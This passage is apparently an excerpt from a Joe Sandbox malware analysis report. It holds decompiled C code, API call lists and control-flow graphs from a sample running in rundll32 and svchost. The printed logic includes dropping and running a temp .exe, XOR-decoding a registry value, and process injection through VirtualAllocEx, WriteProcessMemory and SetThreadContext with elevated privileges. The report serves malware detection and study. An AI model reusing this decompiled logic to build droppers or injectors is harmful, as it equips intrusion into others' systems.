                                                            					 *0x46878c8 = 0;
                                                            					WaitForSingleObject(_v112, 0xffffffff);
                                                            					_t68 =  *((intOrPtr*)(_t80 + 0x10));
                                                            					if(_t68 != 0) {
                                                            						 *((intOrPtr*)( *_t68))(1);
                                                            					}
                                                            					_v128 = 0x467e8b0;
                                                            					CloseHandle( *(_t80 + 0xc));
                                                            					_v128 = 0x467e8c0;
                                                            				}
                                                            				E04638C90( &_v108);
                                                            				_t50 = _v28;
                                                            				if(_v28 != 0) {
                                                            					L04655B0F(_t50);
                                                            					_t80 = _t80 + 4;
                                                            				}
                                                            				_t51 = _v80;
                                                            				_v20 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v60 = 0x467df88;
                                                            				_v68 = 0x467e008;
                                                            				if(_v80 != 0) {
                                                            					L04655B0F(_t51);
                                                            					_t80 = _t80 + 4;
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t80);
                                                            			}

                                                            Instruction addresses: 0x04639826, 0x04639829, 0x04639830, 0x04639840, 0x0463984a, 0x04639852, 0x0463985a, 0x04639862, 0x0463986a, 0x04639872, 0x0463987a, 0x04639882, 0x0463988a, 0x04639892, 0x0463989a, 0x046398a2, 0x046398a7, 0x046398b7, 0x046398ba, 0x046398bb, 0x046398c7, 0x046398d7, 0x046398dc, 0x046398e2, 0x046398e8, 0x046398e8, 0x046398eb, 0x046398f1, 0x046398fb, 0x046398fb, 0x04639906, 0x0463990e, 0x04639915, 0x0463991b, 0x04639921, 0x04639927, 0x04639927, 0x0463992d, 0x04639935, 0x0463993b, 0x0463993b, 0x04639947, 0x0463994c, 0x04639952, 0x04639955, 0x0463995a, 0x0463995a, 0x0463995d, 0x04639961, 0x04639969, 0x04639971, 0x04639979, 0x04639981, 0x0463998b, 0x0463998e, 0x04639993, 0x04639993, 0x046399a7

                                                            APIs
                                                              • Part of subcall function 04637980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0464B836), ref: 046379B0
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 046379C2
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 046379D5
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 046379E8
                                                            • WaitForSingleObject.KERNEL32(?), ref: 04639915
                                                            • CloseHandle.KERNEL32(0467D858), ref: 04639935
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CloseHandleLibraryLoadObjectSingleWait
                                                            • String ID: C
                                                            • API String ID: 2253563908-1037565863
                                                            • Opcode ID: d8b85f358cab0eb9029ee7b56e41cfc0243edf3c9c95762edb7c1fbe3b90068b
                                                            • Instruction ID: d4bec2c962c6877ecdedbd9e34eab4b8553a4f23fad9134ceb565f51752ac6ed
                                                            • Opcode Fuzzy Hash: d8b85f358cab0eb9029ee7b56e41cfc0243edf3c9c95762edb7c1fbe3b90068b
                                                            • Instruction Fuzzy Hash: 3C4127B05083819BE710DF64C45871BBBE4EF91359F144A1CF9A28A2A0EB75E808CF93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0463E360(intOrPtr* _a4) {
                                                            				void* _t22;
                                                            				short* _t27;
                                                            				intOrPtr _t37;
                                                            				void* _t39;
                                                            				intOrPtr* _t41;
                                                            
                                                            				_t41 = _a4;
                                                            				_t39 = 0;
                                                            				 *(_t41 + 0x24) = 1;
                                                            				if( *((intOrPtr*)( *_t41 + 0x18)) <= 0) {
                                                            					L4:
                                                            					if( *((intOrPtr*)(_t41 + 0x14)) != 0) {
                                                            						_t37 =  *_t41;
                                                            						_t50 =  *((intOrPtr*)(_t37 + 0x24));
                                                            						if( *((intOrPtr*)(_t37 + 0x24)) > 0) {
                                                            							_t27 = E0463E0C0(( *(_t37 + 0x4d) & 0x000000ff) + ( *(_t37 + 0x4c) & 0x000000ff) + ( *(_t37 + 0x4b) & 0x000000ff) + ( *(_t37 + 0x4a) & 0x000000ff), _t37, _t50, ( *(_t37 + 0x4d) & 0x000000ff) + ( *(_t37 + 0x4c) & 0x000000ff) + ( *(_t37 + 0x4b) & 0x000000ff) + ( *(_t37 + 0x4a) & 0x000000ff));
                                                            							E0463E5C0(_t41);
                                                            							_t22 = E0463E040(_t27,  *((intOrPtr*)(_t41 + 0x14)),  *((intOrPtr*)( *_t41 + 0x24)));
                                                            							E0463E5C0(_t41);
                                                            							if(_t22 != 0) {
                                                            								ShellExecuteW(0, L"open", _t27,  *(_t41 + 0xc), 0, 1);
                                                            							}
                                                            							L04655B0F(_t27);
                                                            						}
                                                            					}
                                                            					goto L9;
                                                            				} else {
                                                            					while(1) {
                                                            						Sleep(0x3e8);
                                                            						_t39 = _t39 + 1;
                                                            						if( *(_t41 + 0x24) == 0) {
                                                            							break;
                                                            						}
                                                            						if(_t39 <  *((intOrPtr*)( *_t41 + 0x18))) {
                                                            							continue;
                                                            						}
                                                            						goto L4;
                                                            					}
                                                            					L9:
                                                            					return 0;
                                                            				}
                                                            			}

                                                            Instruction addresses: 0x0463e365, 0x0463e369, 0x0463e36d, 0x0463e377, 0x0463e395, 0x0463e399, 0x0463e39b, 0x0463e39d, 0x0463e3a1, 0x0463e3c4, 0x0463e3c6, 0x0463e3d5, 0x0463e3e1, 0x0463e3e8, 0x0463e3f9, 0x0463e3f9, 0x0463e400, 0x0463e405, 0x0463e3a1, 0x00000000, 0x0463e379, 0x0463e380, 0x0463e385, 0x0463e387, 0x0463e38c, 0x00000000, 0x00000000, 0x0463e393, 0x00000000, 0x00000000, 0x00000000, 0x0463e393, 0x0463e40a, 0x0463e40e, 0x0463e40e

                                                            APIs
                                                            • Sleep.KERNEL32(000003E8), ref: 0463E385
                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000001,00000000,00000001), ref: 0463E3F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExecuteShellSleep
                                                            • String ID: open
                                                            • API String ID: 4194306370-2758837156
                                                            • Opcode ID: 4143a85f4bf7604d25bb1f6655e73d7cf88ca18f474f4f606e6a575b31c8a5ea
                                                            • Instruction ID: b7ef1d143b5914231f52a91823ba6f4d98fb8b26f82b00e15c50e5c3fa2c1774
                                                            • Opcode Fuzzy Hash: 4143a85f4bf7604d25bb1f6655e73d7cf88ca18f474f4f606e6a575b31c8a5ea
                                                            • Instruction Fuzzy Hash: FC11D6717002809FF7249B65D854B29B7E5AF5831AF04086DE58A8B382F677FC40CBB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E0463E0C0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                            				char* _v8;
                                                            				void* __esi;
                                                            				signed int _t26;
                                                            				WCHAR* _t28;
                                                            				WCHAR* _t32;
                                                            				signed int _t35;
                                                            				void* _t36;
                                                            				signed int _t40;
                                                            				void* _t44;
                                                            				signed short* _t45;
                                                            				signed int _t53;
                                                            
                                                            				_t36 = __edx;
                                                            				_t34 = __ecx;
                                                            				_push(__ecx);
                                                            				_push(0x208);
                                                            				_v8 = L".exe";
                                                            				_t32 = L04655B55(__ecx, L".exe", __eflags);
                                                            				 *_t32 = 0;
                                                            				_t40 = GetTempPathW(0x104, _t32);
                                                            				if(_t40 != 0 &&  *((short*)(_t32 + _t40 * 2 - 2)) != 0x5c) {
                                                            					_t32[_t40] = 0x5c;
                                                            					_t40 = _t40 + 1;
                                                            					_t53 = _t40;
                                                            				}
                                                            				E0465EF67(_t34, E0465F548(_t34, _t36, _t53, 0) + _a4);
                                                            				_t44 = 8;
                                                            				do {
                                                            					_t26 = E0465EF46(_t34);
                                                            					asm("cdq");
                                                            					_t40 = _t40 + 1;
                                                            					_t34 = 0x1a;
                                                            					 *((short*)(_t32 + _t40 * 2 - 2)) = _t26 % 0x1a + 0x61;
                                                            					_t44 = _t44 - 1;
                                                            				} while (_t44 != 0);
                                                            				_t45 = _v8;
                                                            				_t28 =  &(_t32[_t40]);
                                                            				_t35 = 0x2e;
                                                            				do {
                                                            					 *_t28 = _t35;
                                                            					_t45 =  &(_t45[1]);
                                                            					_t35 =  *_t45 & 0x0000ffff;
                                                            					_t28 =  &(_t28[1]);
                                                            				} while (_t35 != 0);
                                                            				return _t32;
                                                            			}

                                                            Instruction addresses: 0x0463e0c0, 0x0463e0c0, 0x0463e0c3, 0x0463e0cc, 0x0463e0d1, 0x0463e0dc, 0x0463e0e4, 0x0463e0f0, 0x0463e0f4, 0x0463e103, 0x0463e107, 0x0463e107, 0x0463e107, 0x0463e113, 0x0463e11b, 0x0463e120, 0x0463e120, 0x0463e125, 0x0463e126, 0x0463e129, 0x0463e133, 0x0463e138, 0x0463e138, 0x0463e13d, 0x0463e140, 0x0463e143, 0x0463e150, 0x0463e150, 0x0463e153, 0x0463e156, 0x0463e159, 0x0463e15c, 0x0463e169

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 0463E0EA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: PathTemp
                                                            • String ID: .exe$\
                                                            • API String ID: 2920410445-2920562713
                                                            • Opcode ID: f6b8eb1458dc7b10485778205b546b640c2c449d8bc84224bfc4460c879e5d4b
                                                            • Instruction ID: f06d50cc01b4c9410a5ee7caa2c75eca6928b5026b5c3dbd39ee51c2e758b32b
                                                            • Opcode Fuzzy Hash: f6b8eb1458dc7b10485778205b546b640c2c449d8bc84224bfc4460c879e5d4b
                                                            • Instruction Fuzzy Hash: 641148729002099BEF106F94CC49BA677B4EF51315F0541B9ED485B390FBB1BD0483E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E04649620(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				signed int _t17;
                                                            				signed int* _t23;
                                                            				intOrPtr _t32;
                                                            				void* _t35;
                                                            				void* _t36;
                                                            				signed int* _t41;
                                                            				intOrPtr* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t17 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t17 ^ _t44;
                                                            				_t43 = __ecx;
                                                            				E04646050(__ebx, L"Global",  &_v88, __edi, __ecx);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_t23 = E04640C60(0x80000002,  &_v608, L"Global", _t43);
                                                            				_t32 =  *_t43;
                                                            				_t41 = _t23;
                                                            				if(_t32 > 1) {
                                                            					_t35 = _t32 - 1;
                                                            					 *(_t35 + _t41) =  *(_t35 + _t41) ^  *_t41;
                                                            					_t36 = _t35 - 1;
                                                            					while(_t36 != 0) {
                                                            						 *(_t36 + _t41) =  *(_t36 + _t41) ^  *(_t36 +  &(_t41[0]));
                                                            						_t36 = _t36 - 1;
                                                            					}
                                                            					 *(_t36 + _t41) =  *(_t36 + _t41) ^  *(_t36 +  &(_t41[0]));
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t44);
                                                            			}
                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 04649654
                                                              • Part of subcall function 04640C60: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,0464966F,?,?), ref: 04640C73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Open$CloseQueryValuewsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 734024169-1865207932
                                                            • Opcode ID: 477fce7bf72321f63ceea0b84835e5315c05c22d9930e0872ed854ade7dc9ad5
                                                            • Instruction ID: 73788a4b9889f062fba15ad7714612164ec24686739c64574a833d58676f65f8
                                                            • Opcode Fuzzy Hash: 477fce7bf72321f63ceea0b84835e5315c05c22d9930e0872ed854ade7dc9ad5
                                                            • Instruction Fuzzy Hash: 7A016D315091459BCB24DFB8C8544BABB69DFC5218F2401EED0568F203F932A90EC795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0463E660() {
                                                            				intOrPtr* _t10;
                                                            				void* _t11;
                                                            				intOrPtr _t17;
                                                            				void** _t19;
                                                            				intOrPtr* _t21;
                                                            				void* _t28;
                                                            
                                                            				_t10 =  *0x4687aec; // 0x2ab0b60
                                                            				_t21 =  *_t10;
                                                            				if(_t21 == _t10) {
                                                            					return _t10;
                                                            				}
                                                            				do {
                                                            					_t19 =  *(_t21 + 8);
                                                            					_t11 =  *_t19;
                                                            					if(_t11 == 0) {
                                                            						goto L9;
                                                            					}
                                                            					_t19[0xa] = 1;
                                                            					_t19[9] = 0;
                                                            					if( *((intOrPtr*)(_t11 + 4)) != 0) {
                                                            						L7:
                                                            						_t11 = _t19[8];
                                                            						if(_t11 != 0) {
                                                            							WaitForSingleObject(_t11, 0xffffffff);
                                                            							_t11 = CloseHandle(_t19[8]);
                                                            							_t19[8] = 0;
                                                            						}
                                                            						goto L9;
                                                            					}
                                                            					_t17 = _t19[0xb];
                                                            					if(_t19[0xb] == 0) {
                                                            						goto L9;
                                                            					}
                                                            					_t11 = E0463D260(_t17, "stop");
                                                            					if(_t11 == 0) {
                                                            						goto L9;
                                                            					}
                                                            					 *_t11();
                                                            					goto L7;
                                                            					L9:
                                                            					_t19[0xa] = 0;
                                                            					_t21 =  *_t21;
                                                            					_t28 = _t21 -  *0x4687aec; // 0x2ab0b60
                                                            				} while (_t28 != 0);
                                                            				return _t11;
                                                            			}
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,0463E869), ref: 0463E6B2
                                                            • CloseHandle.KERNEL32(?), ref: 0463E6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleObjectSingleWait
                                                            • String ID: stop
                                                            • API String ID: 528846559-3109426870
                                                            • Opcode ID: fa40d2e188a8e9a696225d6a0d5db78bd181a9037a3067203c3ae2a2f7e32bd6
                                                            • Instruction ID: db6859ac7b501550bb0988966b7a58ee8ffb2c02df16b5180b330eaa588b2964
                                                            • Opcode Fuzzy Hash: fa40d2e188a8e9a696225d6a0d5db78bd181a9037a3067203c3ae2a2f7e32bd6
                                                            • Instruction Fuzzy Hash: 1E016232700652AFEB14DF15D844B16B3A4FF1A325F144218D45497B90E776FC50CBB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0463E550(intOrPtr* __ecx) {
                                                            				intOrPtr _t10;
                                                            				void* _t12;
                                                            				intOrPtr* _t16;
                                                            				intOrPtr _t19;
                                                            				intOrPtr* _t20;
                                                            
                                                            				_t20 = __ecx;
                                                            				_t10 =  *__ecx;
                                                            				if(_t10 == 0) {
                                                            					L7:
                                                            					 *(_t20 + 0x28) = 0;
                                                            					return 1;
                                                            				} else {
                                                            					 *((intOrPtr*)(__ecx + 0x28)) = 1;
                                                            					 *(__ecx + 0x24) = 0;
                                                            					if( *((intOrPtr*)(_t10 + 4)) != 0) {
                                                            						L5:
                                                            						_t12 =  *(_t20 + 0x20);
                                                            						if(_t12 != 0) {
                                                            							WaitForSingleObject(_t12, 0xffffffff);
                                                            							CloseHandle( *(_t20 + 0x20));
                                                            							 *(_t20 + 0x20) = 0;
                                                            						}
                                                            						goto L7;
                                                            					} else {
                                                            						_t19 =  *((intOrPtr*)(__ecx + 0x2c));
                                                            						if( *((intOrPtr*)(__ecx + 0x2c)) == 0) {
                                                            							L8:
                                                            							 *(_t20 + 0x28) = 0;
                                                            							return 0;
                                                            						} else {
                                                            							_t16 = E0463D260(_t19, "stop");
                                                            							if(_t16 == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								 *_t16();
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,0463E288,00000000,0463F0D5,00000000,00000000,?,?,00000001), ref: 0463E58E
                                                            • CloseHandle.KERNEL32(?), ref: 0463E597
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleObjectSingleWait
                                                            • String ID: stop
                                                            • API String ID: 528846559-3109426870
                                                            • Opcode ID: 50a3f06d0e7d93d8cf2f0056bf31869a8b0e629a0ac00dd21a360541516d57a3
                                                            • Instruction ID: aea40c4132e774a4b32ae3839eda4eb99bb992b68faf5279a0ef7868bced886b
                                                            • Opcode Fuzzy Hash: 50a3f06d0e7d93d8cf2f0056bf31869a8b0e629a0ac00dd21a360541516d57a3
                                                            • Instruction Fuzzy Hash: 1FF01D706047518FEB749F69E848B5276E4BF08336F144A1CE49AC7690FB76F880CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04656A70(intOrPtr* __ecx, void* __eflags) {
                                                            				intOrPtr* _t13;
                                                            
                                                            				_t13 = __ecx;
                                                            				E04656AC3(__ecx);
                                                            				 *__ecx = 0x38;
                                                            				 *((intOrPtr*)(__ecx + 8)) = 0x4630000;
                                                            				 *((intOrPtr*)(__ecx + 4)) = 0x4630000;
                                                            				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
                                                            				 *((intOrPtr*)(__ecx + 0x10)) = 0x4674758;
                                                            				if(E046316B0(__ecx + 0x14) < 0) {
                                                            					if(IsDebuggerPresent() != 0) {
                                                            						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
                                                            					}
                                                            					 *0x46878c4 = 1;
                                                            				}
                                                            				return _t13;
                                                            			}
                                                            APIs
                                                              • Part of subcall function 046316B0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,04656A9F,00000000,?,046816F4,?,?,?,?,?,?,?,04655B38), ref: 046316B3
                                                              • Part of subcall function 046316B0: GetLastError.KERNEL32(?,?,?,?,?,?,04655B38), ref: 046316BD
                                                            • IsDebuggerPresent.KERNEL32(00000000,?,046816F4,?,?,?,?,?,?,?,04655B38), ref: 04656AA3
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,?,?,?,04655B38), ref: 04656AB2
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 04656AAD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 450123788-631824599
                                                            • Opcode ID: 908aba826dc418791ada562371260d650e236990c8484e3dd86316146f98d149
                                                            • Instruction ID: 9db5d73d60a9757c26b13b5bf97b5c261b8e645dbcd40c6356a0ef73c2a7be3a
                                                            • Opcode Fuzzy Hash: 908aba826dc418791ada562371260d650e236990c8484e3dd86316146f98d149
                                                            • Instruction Fuzzy Hash: ABE06D706007808BE3609F68E5087427BE0EB05309F05CA5CE89AC2350FBB8F858CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 22baf54c670-22baf54c70f call 22baf563830 * 2 GetVersionExW call 22baf549480 7 22baf54c711-22baf54c718 call 22baf549530 0->7 8 22baf54c71e-22baf54c720 0->8 7->8 10 22baf54c7f8 7->10 8->10 11 22baf54c726-22baf54c73d OpenProcess 8->11 13 22baf54c7fa-22baf54c81a GetSystemDirectoryW 10->13 11->10 14 22baf54c743-22baf54c786 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 11->14 15 22baf54c81c-22baf54c838 13->15 16 22baf54c846-22baf54c863 wsprintfW 13->16 14->10 17 22baf54c788-22baf54c78b 14->17 18 22baf54cb51-22baf54cbac call 22baf55ad48 call 22baf54dc70 * 2 call 22baf54db00 * 2 15->18 19 22baf54c83e 15->19 20 22baf54c9e0-22baf54ca1d CreateProcessW 16->20 21 22baf54c869-22baf54c895 LoadLibraryA GetProcAddress 16->21 17->10 22 22baf54c78d-22baf54c7bd call 22baf55a828 17->22 86 22baf54cbae-22baf54cbb3 Sleep 18->86 87 22baf54cbb9-22baf54cbbb 18->87 19->16 23 22baf54ca1f-22baf54ca22 20->23 24 22baf54c8a0-22baf54c8ba 21->24 64 22baf54c8f9-22baf54c903 call 22baf55a7e4 22->64 65 22baf54c7c3-22baf54c7e8 22->65 26 22baf54ca58-22baf54ca5f 23->26 27 22baf54ca24-22baf54ca44 LoadLibraryA GetProcAddress 23->27 24->20 38 22baf54c8c0-22baf54c8d2 24->38 34 22baf54ca61 CloseHandle 26->34 35 22baf54ca67-22baf54ca69 26->35 30 22baf54ca4b-22baf54ca53 call 22baf55a7e4 27->30 31 22baf54ca46 27->31 30->26 31->30 34->35 40 22baf54ca6b-22baf54ca89 GetThreadContext 35->40 41 22baf54cabe 35->41 45 22baf54c8d4-22baf54c8d8 38->45 46 22baf54c916-22baf54c91c 38->46 40->41 47 22baf54ca8b-22baf54cab4 VirtualAllocEx 40->47 44 22baf54cac0-22baf54cae9 call 22baf55a7c0 41->44 54 22baf54c8e0-22baf54c8eb 45->54 52 22baf54c941-22baf54c966 LoadLibraryA GetProcAddress 46->52 53 22baf54c91e 46->53 48 22baf54caea-22baf54cb04 WriteProcessMemory 47->48 49 22baf54cab6 47->49 59 22baf54cb0f-22baf54cb2a SetThreadContext 48->59 60 22baf54cb06-22baf54cb0d 48->60 56 22baf54cab8 TerminateProcess 49->56 78 22baf54c980-22baf54c98d call 22baf54c5c0 52->78 79 22baf54c968-22baf54c978 Sleep 52->79 61 22baf54c920-22baf54c92c 53->61 62 22baf54c8ed-22baf54c8f2 54->62 63 22baf54c908-22baf54c914 54->63 56->41 59->60 70 22baf54cb2c-22baf54cb3a ResumeThread 59->70 60->56 68 22baf54c92e-22baf54c933 61->68 69 22baf54c937-22baf54c93d 61->69 62->54 72 22baf54c8f4 62->72 63->46 63->52 64->13 80 22baf54c7ee-22baf54c7f2 65->80 81 22baf54c8f6 65->81 68->61 76 22baf54c935 68->76 69->52 70->60 77 22baf54cb3c-22baf54cb4c CloseHandle 70->77 72->46 76->52 77->44 78->20 88 22baf54c98f-22baf54c9de CreateProcessAsUserW CloseHandle 78->88 79->24 84 22baf54c97e 79->84 80->10 81->64 84->20 86->87 89 22baf54cbbd-22baf54cbc2 Sleep 87->89 90 22baf54cbc8-22baf54cbca 87->90 88->20 88->23 89->90 91 22baf54cbcc-22baf54cbd1 Sleep 90->91 92 22baf54cbd7-22baf54cbd9 90->92 91->92 93 22baf54cbdb-22baf54cbe0 Sleep 92->93 94 22baf54cbe6-22baf54cbfd call 22baf54be20 92->94 93->94 96 22baf54cc02-22baf54cc06 94->96 97 22baf54cc0c-22baf54cc15 96->97 98 22baf54ccc3 96->98 99 22baf54cd00-22baf54cd0e call 22baf54bfa0 97->99 100 22baf54cc1b-22baf54cc29 call 22baf54bfa0 97->100 101 22baf54ccc5-22baf54cccd 98->101 109 22baf54cd10-22baf54cd24 call 22baf54c100 99->109 110 22baf54cd5d-22baf54cd62 99->110 100->99 108 22baf54cc2f 100->108 103 22baf54cccf CloseHandle 101->103 104 22baf54ccd5-22baf54cceb 101->104 103->104 111 22baf54cc30-22baf54cc35 108->111 109->99 124 22baf54cd26-22baf54cd2c 109->124 112 22baf54ce50-22baf54ce61 SetConsoleCtrlHandler 110->112 113 22baf54cd68-22baf54cd6d 110->113 115 22baf54ccb0-22baf54ccc1 SetConsoleCtrlHandler 111->115 116 22baf54cc37-22baf54cc3c 111->116 112->112 119 22baf54ce63 112->119 117 22baf54ce18-22baf54ce2e OpenThread 113->117 118 22baf54cd73-22baf54cd92 Sleep call 22baf54c100 113->118 115->98 115->115 116->115 121 22baf54cc3e-22baf54cc54 OpenThread 116->121 117->109 122 22baf54ce34-22baf54ce40 WaitForSingleObject 117->122 118->99 131 22baf54cd98-22baf54cd9e 118->131 119->101 121->99 125 22baf54cc5a-22baf54cc76 WaitForSingleObject GetExitCodeThread 121->125 126 22baf54ccec-22baf54ccf5 CloseHandle 122->126 124->99 128 22baf54cd2e-22baf54cd44 call 22baf54c670 call 22baf55a7e4 124->128 129 22baf54cc7e-22baf54cc91 call 22baf54be20 125->129 130 22baf54cc78-22baf54cc7c 125->130 126->99 128->99 142 22baf54cd46-22baf54cd59 WaitForSingleObject 128->142 129->99 140 22baf54cc93-22baf54cca1 call 22baf54bfa0 129->140 130->98 130->129 131->99 135 22baf54cda4-22baf54cdba call 22baf54c670 call 22baf55a7e4 131->135 135->99 149 22baf54cdc0-22baf54cdd3 WaitForSingleObject 135->149 140->111 148 22baf54cca3 140->148 142->99 145 22baf54cd5b 142->145 145->126 148->99 149->99 150 22baf54cdd9-22baf54cdf7 CloseHandle call 22baf538a60 149->150 153 22baf54ce00-22baf54ce11 SetConsoleCtrlHandler 150->153 153->153 154 22baf54ce13 153->154 154->101
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$Process$AddressOpenProcSleepThread$LibraryLoad$ObjectSingleWait$Createwsprintf$ContextCurrentProcess32$AllocCodeConsoleCtrlDirectoryEventExitFirstHandlerMemoryModuleNextQueryResumeSnapshotSystemTerminateToolhelp32UserValueVersionVirtualWrite
                                                            • String ID: %ssvchost.exe -k WspService$@$Control$DeleteProcThreadAttributeList$Dispatch$InitializeProcThreadAttributeList$SeAssignPrimaryTokenPrivilege$SeDebugPrivilege$SeIncreaseQuotaPrivilege$SeTcbPrivilege$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$kernel32.dll
                                                            • API String ID: 1264320819-619775204
                                                            • Opcode ID: e0b9272f5675718f1d25d3e68456d62b7036b666d676c3fa1658bde5efbdda2d
                                                            • Instruction ID: 7a73cf46122081426b1c2d90e1421009d159d7e30620e3e87312f60de8caa78c
                                                            • Opcode Fuzzy Hash: e0b9272f5675718f1d25d3e68456d62b7036b666d676c3fa1658bde5efbdda2d
                                                            • Instruction Fuzzy Hash: B2228133600A40B2EB72DFA5E84D3E977A2FBC5B45F444525DA4A43BAAEF3AC505C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
